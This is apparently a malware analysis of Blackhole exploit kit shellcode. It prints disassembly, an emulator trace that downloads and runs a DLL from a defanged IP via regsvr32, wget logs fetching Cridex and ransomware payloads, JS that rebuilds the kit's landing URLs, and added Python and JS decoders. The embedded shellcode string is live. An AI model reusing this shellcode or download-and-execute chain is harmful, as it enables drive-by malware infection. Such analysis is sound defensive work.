000001B6 1810 sbb [eax],dl
000001B8 1810 sbb [eax],dl
000001BA 4E dec esi
000001BB 07 pop es
000001BC 5A pop edx
000001BD 47 inc edi
000001BE 45 inc ebp
000001BF 5D pop ebp
000001C0 44 inc esp
000001C1 07 pop es
000001C2 46 inc esi
000001C3 41 inc ecx
000001C4 5B pop ebx
000001C5 43 inc ebx
000001C6 58 pop eax
000001C7 07 pop es
000001C8 4A dec edx
000001C9 5D pop ebp
000001CA 41 inc ecx
000001CB 44 inc esp
000001CC 774B ja 0x219
000001CE 4D dec ebp
000001CF 5E pop esi
000001D0 5B pop ebx
000001D1 5A pop edx
000001D2 47 inc edi
000001D3 41 inc ecx
000001D4 06 push es
000001D5 46 inc esi
000001D6 40 inc eax
000001D7 58 pop eax
000001D8 17 pop ss
000001D9 58 pop eax
000001DA 4E dec esi
000001DB 5C pop esp
000001DC 1B1512184619 sbb edx,[dword 0x19461812]
000001E2 1912 sbb [edx],edx
000001E4 124141 adc al,[ecx+0x41]
000001E7 191B sbb [ebx],ebx
000001E9 120E adc cl,[esi]
000001EB 1B4D5F sbb ecx,[ebp+0x5f]
000001EE 1A15125E4319 sbb dl,[dword 0x19435e12]
000001F4 1912 sbb [edx],edx
000001F6 12451A adc al,[ebp+0x1a]
000001F9 1B1B sbb ebx,[ebx]
000001FB 1212 adc dl,[edx]
000001FD 1B4319 sbb eax,[ebx+0x19]
00000200 1912 sbb [edx],edx
00000202 124319 adc al,[ebx+0x19]
00000205 1B19 sbb ebx,[ecx]
00000207 1212 adc dl,[edx]
00000209 42 inc edx
0000020A 47 inc edi
0000020B 19590E sbb [ecx+0xe],ebx
0000020E 19150E434045 sbb [dword 0x4540430e],edx
00000214 58 pop eax
00000215 155E0E155E adc eax,0x5e150e5e
0000021A 285A00 sub [edx+0x0],bl ; math
0000021D 28 db 0x28
// API calls made by the decoded shellcode (emulator trace)..
blocks.. translation..
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
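The same decoding carried through end-to-end in Python, as an added example by the editor (not part of the original paste or of the kit): it replays the JS de-obfuscation above on `var a`, unescapes the %u words in the byte order the hex views use (low byte first; read big-endian the same words give a plausible-looking but wrong instruction stream), reads the XOR key and byte count out of the decoder stub instead of assuming them, and recovers the download URL and the `urlmon` string that the API trace shows. Only `var a` is embedded; `var b` decodes the same way because the stub is parsed, not hard-coded. Function names are the example's own.

```python
"""
Re-decode the Blackhole shellcode: JS de-obfuscation, %u unescape, decoder-stub
parsing, XOR decode, and recovery of the strings the API trace shows.
"""
import re

# "var a" exactly as it appears in the page's JS snippet (stored reversed, with
# "%!" standing in for the "%u" escape).
OBFUSCATED_A = "8200!%1482!%0451!%e024!%5185!%7415!%34e0!%5191!%e0c5!%9114!%7421!%2191!%9164!%7421!%2191!%9114!%f421!%2191!%9144!%a121!%21b1!%b1b1!%2421!%5191!%24d4!%e4e0!%2191!%b1a1!%2421!%2191!%9124!%0421!%5191!%64e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%"


def deobfuscate(s: str) -> str:
    """Same transform as the page's JS: reverse, then put the '%u' escape back."""
    return s[::-1].replace("%!", "%u")


def unescape_u(s: str) -> bytes:
    """%uXXYY -> bytes YY XX: the sprayed UTF-16 code units sit in memory low byte first."""
    words = re.findall(r"%u([0-9a-fA-F]{4})", s)
    return b"".join(int(w, 16).to_bytes(2, "little") for w in words)


# Decoder stub as it sits in the byte stream (offsets 0x0c-0x1f of both shellcodes):
#   31 c9              xor ecx, ecx
#   66 81 e9 LL HH     sub cx, imm16        -> ecx = (-imm16) & 0xffff = bytes to decode
#   80 30 KK           xor byte [eax], KK   -> single-byte XOR key
#   40 / e2 fa         inc eax ; loop
#   eb 05              jmp over the call
#   e8 eb ff ff ff     call back to 'pop eax': the pushed return address is the body
DECODER_STUB = re.compile(
    rb"\x31\xc9\x66\x81\xe9(..)\x80\x30(.)\x40\xe2\xfa\xeb\x05\xe8\xeb\xff\xff\xff",
    re.DOTALL,
)


def parse_decoder(sc: bytes):
    """Return (key, byte_count, body_offset) read out of the stub rather than guessed."""
    m = DECODER_STUB.search(sc)
    if m is None:
        raise ValueError("decoder stub not found; different shellcode variant")
    imm16 = int.from_bytes(m.group(1), "little")
    count = (-imm16) & 0xFFFF
    key = m.group(2)[0]
    return key, count, m.end()


def decode_body(sc: bytes) -> bytes:
    key, count, start = parse_decoder(sc)
    return bytes(b ^ key for b in sc[start:start + count])


def extract_url(decoded: bytes) -> str:
    """The download URL is a NUL-terminated ASCII string at the end of the decoded body."""
    i = decoded.find(b"http://")
    if i < 0:
        raise ValueError("no URL in decoded body")
    end = decoded.find(b"\x00", i)
    return decoded[i:end if end >= 0 else len(decoded)].decode("ascii")


def pushed_strings(decoded: bytes) -> list:
    """Recover strings built on the stack as a run of 'push imm32' ending in 'push esp'
    (68 xx xx xx xx ... 54). The last push lands at the lowest address, so walking
    backwards from 'push esp' yields the string in reading order."""
    found = []
    for i, b in enumerate(decoded):
        if b != 0x54:
            continue
        chunks, j = [], i
        while j >= 5 and decoded[j - 5] == 0x68:
            chunks.append(decoded[j - 4:j])
            j -= 5
        s = b"".join(chunks).rstrip(b"\x00")
        if s and all(0x20 <= c < 0x7F for c in s):
            found.append(s.decode("ascii"))
    return found


def defang(url: str) -> str:
    return url.replace("http://", "h00p://", 1)


def analyse(obfuscated: str) -> dict:
    sc = unescape_u(deobfuscate(obfuscated))
    key, count, start = parse_decoder(sc)
    decoded = decode_body(sc)
    return {
        "size": len(sc),
        "key": key,
        "count": count,
        "body_offset": start,
        "url": defang(extract_url(decoded)),
        "pushed": pushed_strings(decoded),
    }


if __name__ == "__main__":
    for k, v in analyse(OBFUSCATED_A).items():
        print(f"{k}: {v}")
```

The stub is matched as a byte pattern so the key and length come from the sample itself; the `wpbt0.dll` and `regsvr32 -s ` strings are not recovered by `pushed_strings` because the shellcode assembles them with `mov dword [esp+disp]` stores rather than pushes, which is why only `urlmon` is expected from that routine.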
// second shellcode: identical code, only the URL query string at the end differs...
// raws (hex view below)..
// view...
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
e9 03 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a X@\\X...........
1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45 ...........NGZ]E
07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d .DAFC[.X]JDAKw^M
5a 5b 41 47 46 06 58 40 58 17 46 4e 15 19 40 12 Z[AGF.X@X.FN..@.
19 42 12 19 42 12 1b 1a 12 19 4e 0e 42 4d 15 19 .B..B.....N.BM..
42 12 1b 1b 12 1b 1a 12 19 44 12 19 4f 12 19 41 B........D..O..A
12 19 47 12 19 46 12 19 47 12 19 41 0e 5c 15 19 ..G..F..G..A.\..
43 0e 47 51 15 58 0e 42 40 15 41 28 28 00 C.GQ.X.B@.A((.
//disasm... NOTE: like the first listing, this was disassembled from byte-swapped input (the %u words
// read big-endian, so every byte pair is swapped against the hex view above); the real stub is a
// 509-byte single-byte XOR decoder, key 0x28, with the encoded body starting at offset 0x20.
00000000 41 inc ecx
00000001 41 inc ecx
00000002 41 inc ecx
00000003 41 inc ecx
00000004 8366FCE4 and dword [esi-0x4],byte -0x1c
00000008 EBFC jmp short 0x6 ; loop
0000000A 58 pop eax
0000000B 10C9 adc cl,cl
0000000D 31816603E980 xor [ecx-0x7f16fc9a],eax ; decryption
00000013 FE db 0xfe
00000014 2830 sub [eax],dh ; math
00000016 E240 loop 0x58 ; loop
00000018 EBFA jmp short 0x14 ; loop
0000001A E805FFEBFF call dword 0xffebff24 ; call
0000001F FFCC dec esp
00000021 AD lodsd
00000022 1C5D sbb al,0x5d
00000024 77C1 ja 0xffffffe7
00000026 E81BA34C18 call dword 0x184ca346 ; call
0000002B 6868A3A324 push dword 0x24a3a368
00000030 3458 xor al,0x58 ; decryption
00000032 A37E205EF3 mov [0xf35e207e],eax
00000037 1BA34E14765C sbb esp,[ebx+0x5c76144e]
0000003D 2B041B sub eax,[ebx+ebx] ; math
00000040 C6 db 0xc6
00000041 A9383DD7D7 test eax,0xd7d73d38
00000046 A39018686E mov [0x6e681890],eax
0000004B EB2E jmp short 0x7b ; loop
0000004D 11D3 adc ebx,edx
0000004F 5D pop ebp
00000050 1CAF sbb al,0xaf
00000052 AD lodsd
00000053 0C5D or al,0x5d
00000055 CC int3
00000056 C17964C3 sar dword [ecx+0x64],0xc3
0000005A 7E79 jng 0xd5
0000005C 5D pop ebp
0000005D A3A3141D5C mov [0x5c1d14a3],eax
00000062 2B507E sub edx,[eax+0x7e] ; math
00000065 DD5EA3 fstp qword [esi-0x5d]
00000068 2B08 sub ecx,[eax] ; math
0000006A 1BDD sbb ebx,ebp
0000006C 61 popad
0000006D E1D4 loope 0x43
0000006F 692B851BED27 imul ebp,[ebx],dword 0x27ed1b85
00000075 F33896DA10205C rep cmp [esi+0x5c2010da],dl
0000007C E3E9 jecxz 0x67
0000007E 2B2568F2D9C3 sub esp,[dword 0xc3d9f268] ; math
00000084 37 aaa
00000085 13CE adc ecx,esi
00000087 5D pop ebp
00000088 A3760C76F5 mov [0xf5760c76],eax
0000008D 2BA34E63246E sub esp,[ebx+0x6e24634e] ; math
00000093 A5 movsd
00000094 D7 xlatb
00000095 C40C7C les ecx,[esp+edi*2]
00000098 A3242BF0A3 mov [0xa3f02b24],eax
0000009D F5 cmc
0000009E A32CED2B76 mov [0x762bed2c],eax
000000A3 83EB71 sub ebx,byte +0x71 ; math
000000A6 7BC3 jpo 0x6b
000000A8 A385084055 mov [0x55400885],eax
000000AD A81B test al,0x1b
000000AF 242B and al,0x2b
000000B1 5C pop esp
000000B2 C3 ret
000000B3 BEA3DB2040 mov esi,0x4020dba3
000000B8 DFA32D42C071 fbld tword [ebx+0x71c0422d]
000000BE D7 xlatb
000000BF B0D7 mov al,0xd7
000000C1 D7 xlatb
000000C2 D1CA ror edx,1 ; bitwise cipher
000000C4 28C0 sub al,al ; math
000000C6 2828 sub [eax],ch ; math
000000C8 7028 jo 0xf2
000000CA 42 inc edx
000000CB 7840 js 0x10d
000000CD 6828D72828 push dword 0x2828d728
000000D2 AB stosd
000000D3 7831 js 0x106
000000D5 E87D78C4A3 call dword 0xa3c47957 ; call
000000DA 76A3 jna 0x7f
000000DC AB stosd
000000DD 382DEBCBD747 cmp [dword 0x47d7cbeb],ch
000000E3 40 inc eax
000000E4 284640 sub [esi+0x40],al ; math
000000E7 285A5D sub [edx+0x5d],bl ; math
000000EA 45 inc ebp
000000EB 44 inc esp
000000EC D7 xlatb
000000ED 7CAB jl 0x9a
000000EF 3E20EC ds and ah,ch
000000F2 C0A349C0D7D7C3 shl byte [ebx-0x28283fb7],0xc3
000000F9 D7 xlatb
000000FA C3 ret
000000FB 2AA95A2CC428 sub ch,[ecx+0x28c42c5a] ; math
00000101 29A5280C74EF sub [ebp-0x108bf3d8],esp ; math
00000107 240C and al,0xc
00000109 2C4D sub al,0x4d ; math
0000010B 5A pop edx
0000010C 5B pop ebx
0000010D 4F dec edi
0000010E 6C insb
0000010F EF out dx,eax
00000110 2C0C sub al,0xc ; math
00000112 5A pop edx
00000113 5E pop esi
00000114 1A1B sbb bl,[ebx]
00000116 6C insb
00000117 EF out dx,eax
00000118 200C0508085B40 and [eax+0x405b0808],cl
0000011F 7B28 jpo 0x149
00000121 D028 shr byte [eax],1
00000123 287ED7 sub [esi-0x29],bh ; math
00000126 A3241BC079 mov [0x79c01b24],eax
0000012B E16C loope 0x199
0000012D EF out dx,eax
0000012E 2835585F5C4A sub [dword 0x4a5c5f58],dh ; math
00000134 6C insb
00000135 EF out dx,eax
00000136 2D354C0644 sub eax,0x44064c35 ; math
0000013B 44 inc esp
0000013C 6C insb
0000013D EE out dx,al
0000013E 21357128E9A2 and [dword 0xa2e92871],esi
00000144 182C6C sbb [esp+ebp*2],ch
00000147 A02C357969 mov al,[0x6979352c]
0000014C 284228 sub [edx+0x28],al ; math
0000014F 42 inc edx
00000150 7F7B jg 0x1cd
00000152 28427E sub [edx+0x7e],al ; math
00000155 D7 xlatb
00000156 AD lodsd
00000157 3C5D cmp al,0x5d
00000159 E8423E7B28 call dword 0x287b3fa0 ; call
0000015E 7ED7 jng 0x137
00000160 42 inc edx
00000161 2CAB sub al,0xab ; math
00000163 2824C3 sub [ebx+eax*8],ah ; math
00000166 D7 xlatb
00000167 7B2C jpo 0x195
00000169 7EEB jng 0x156
0000016B AB stosd
0000016C C3 ret
0000016D 24C3 and al,0xc3
0000016F 2A6F3B sub ch,[edi+0x3b] ; math
00000172 17 pop ss
00000173 A85D test al,0x5d
00000175 286FD2 sub [edi-0x2e],ch ; math
00000178 17 pop ss
00000179 A85D test al,0x5d
0000017B 2842EC sub [edx-0x14],al ; math
0000017E 42 inc edx
0000017F 28D7 sub bh,dl ; math
00000181 D6 salc
00000182 207EB4 and [esi-0x4c],bh
00000185 C0D7D6 rcl bh,0xd6
00000188 A6 cmpsb
00000189 D7 xlatb
0000018A 2666B0C4 es o16 mov al,0xc4
0000018E A2D6A12629 mov [0x2926a1d6],al
00000193 47 inc edi
00000194 1B95A2E23373 sbb edx,[ebp+0x7333e2a2]
0000019A 6E outsb
0000019B EE out dx,al
0000019C 1E push ds
0000019D 51 push ecx
0000019E 07 pop es
0000019F 324058 xor al,[eax+0x58] ; decryption
000001A2 5C pop esp
000001A3 5C pop esp
000001A4 125807 adc bl,[eax+0x7]
000001A7 07 pop es
000001A8 1E push ds
000001A9 1C19 sbb al,0x19
000001AB 06 push es
000001AC 1D1F1A061C sbb eax,0x1c061a1f
000001B1 1A1A sbb bl,[edx]
000001B3 06 push es
000001B4 1219 adc bl,[ecx]
000001B6 1810 sbb [eax],dl
000001B8 1810 sbb [eax],dl
000001BA 4E dec esi
000001BB 07 pop es
000001BC 5A pop edx
000001BD 47 inc edi
000001BE 45 inc ebp
000001BF 5D pop ebp
000001C0 44 inc esp
000001C1 07 pop es
000001C2 46 inc esi
000001C3 41 inc ecx
000001C4 5B pop ebx
000001C5 43 inc ebx
000001C6 58 pop eax
000001C7 07 pop es
000001C8 4A dec edx
000001C9 5D pop ebp
000001CA 41 inc ecx
000001CB 44 inc esp
000001CC 774B ja 0x219
000001CE 4D dec ebp
000001CF 5E pop esi
000001D0 5B pop ebx
000001D1 5A pop edx
000001D2 47 inc edi
000001D3 41 inc ecx
000001D4 06 push es
000001D5 46 inc esi
000001D6 40 inc eax
000001D7 58 pop eax
000001D8 17 pop ss
000001D9 58 pop eax
000001DA 4E dec esi
000001DB 5C pop esp
000001DC 1B1512184619 sbb edx,[dword 0x19461812]
000001E2 1912 sbb [edx],edx
000001E4 124141 adc al,[ecx+0x41]
000001E7 191B sbb [ebx],ebx
000001E9 120E adc cl,[esi]
000001EB 1B4D5F sbb ecx,[ebp+0x5f]
000001EE 1A15125E4319 sbb dl,[dword 0x19435e12]
000001F4 1912 sbb [edx],edx
000001F6 12451A adc al,[ebp+0x1a]
000001F9 1B1B sbb ebx,[ebx]
000001FB 1212 adc dl,[edx]
000001FD 1B4319 sbb eax,[ebx+0x19]
00000200 1912 sbb [edx],edx
00000202 124319 adc al,[ebx+0x19]
00000205 1B19 sbb ebx,[ecx]
00000207 1212 adc dl,[edx]
00000209 42 inc edx
0000020A 47 inc edi
0000020B 19590E sbb [ecx+0xe],ebx
0000020E 19150E434045 sbb [dword 0x4540430e],edx
00000214 58 pop eax
00000215 155E0E155E adc eax,0x5e150e5e
0000021A 285A00 sub [edx+0x0],bl ; math
0000021D 28 db 0x28
//translating API..
blocks.... translation...
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
//============================
// PAYLOADS GOES FIRST...
//============================
// fetch these sh*ts...
--2013-02-18 15:08:46-- h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r http/1.0
Host: 46.175.224.21:8080
http request sent, awaiting response...
:
http/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 06:08:39 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Mon, 18 Feb 2013 06:08:39 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Transfer-Encoding: binary
Content-Length: 94208
:
200 OK
Length: 94208 (92K) [application/x-msdownload]
Saving to: `./about.exe'
2013-02-18 15:08:48 (59.5 KB/s) - `./about.exe' saved [94208/94208]
--2013-02-18 15:07:55-- h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i http/1.0
Host: 46.175.224.21:8080
http request sent, awaiting response...
:
h00p/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 06:07:48 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Mon, 18 Feb 2013 06:07:48 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 279040
:
200 OK
Length: 279040 (273K) [application/x-msdownload]
Saving to: `./readme.exe'
2013-02-18 15:08:00 (70.7 KB/s) - `./readme.exe' saved [279040/279040]
//Payloads checks...Cridex & ransomware....
https://www.virustotal.com/ja/file/bea956049c02eefa07495dda55a1624ba3fe4020ed268094f7b63ec53439d48d/analysis/1361171081/
https://www.virustotal.com/ja/file/5050a5bdf164767ba6a8432a273942983737b3553c2f0d8fdbab42bbdaab3f6e/analysis/1361171101/
=============CRACK LOGIC FOR PDF URL==================
function x(s){
    var d = [];
    for (var i = 0; i < s.length; i++){
        // each character code is written in base 33, e.g. "2" (0x32) -> "1h"
        var k = (s.charCodeAt(i)).toString(33);
        d.push(k);
    }
    return d.join(":");
}
var domain="h00p://46.175.224.21:8080";
var pdf ="1k:1d:1f:1d:1g:1d:1f";
var string1 ="/forum/links/public_version.php?tzpiqxci=" + x("244e0") + "&rqoddrzb=" + x("bpc") + "&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=";
var string2 ="/forum/links/public_version.php?iitxovwc=" + x("244e0") + "&hic=" + x("c") + "&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=" ;
var string3 ="/forum/links/public_version.php?hysb=" + x("c833f") + "&togkor=" + x("oyt") + "&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=";
var string4 ="/forum/links/public_version.php?myedivup=" + x("c833f") + ">aaynbu=" + x("h") + "&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=";
var url1 = domain + string1 + pdf;
var url2 = domain + string2 + pdf;
var url3 = domain + string3 + pdf;
var url4 = domain + string4 + pdf;
document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
// output:
h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33>aaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
//=============CRACK LOGIC FOR SWF URL==================
function x(s){
    var d = [];
    for (var i = 0; i < s.length; i++){
        // same base-33 per-character encoding as the PDF URL builder
        var k = (s.charCodeAt(i)).toString(33);
        d.push(k);
    }
    return d.join(":");
}
var domain="h00p://46.175.224.21:8080";
var url1 = domain + "/forum/links/public_version.php?jwio=" + x("244e0") + "&xnrj=" + x("nxjmw") + "&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg";
var url2 = domain + "/forum/links/public_version.php?ecxrx=" + x("244e0") + "&pihpkcv=" + x("tlil") + "&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda";
var url3 = domain + "/forum/links/public_version.php?jsehhtfz=" + x("c833f") + "&rrhjmwf=" + x("eomsp") + "&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms";
var url4 = domain + "/forum/links/public_version.php?efoo=" + x("c833f") + "&bpsmrsqj=" + x("wdrh") + "&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx";
document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
// output
h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
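The PDF and SWF crack logic above both build their URLs with the same x() encoder, so one decoder covers both. This is an added example, not code from the original post or from the kit: it inverts x() and parses a landing URL from the lists above back into plaintext parameters, which is what you want when these URLs show up in proxy or IDS logs. The function names (decodeB33, encodeB33, decodeBhekUrl) are my own.

```javascript
// Added example, not part of the original post: undo the base-33,
// colon-joined encoding that the page's x() applies to BHEK query values.

// Inverse of the page's x(): "1h:1j:1j:32:1f" -> "244e0"
function decodeB33(value) {
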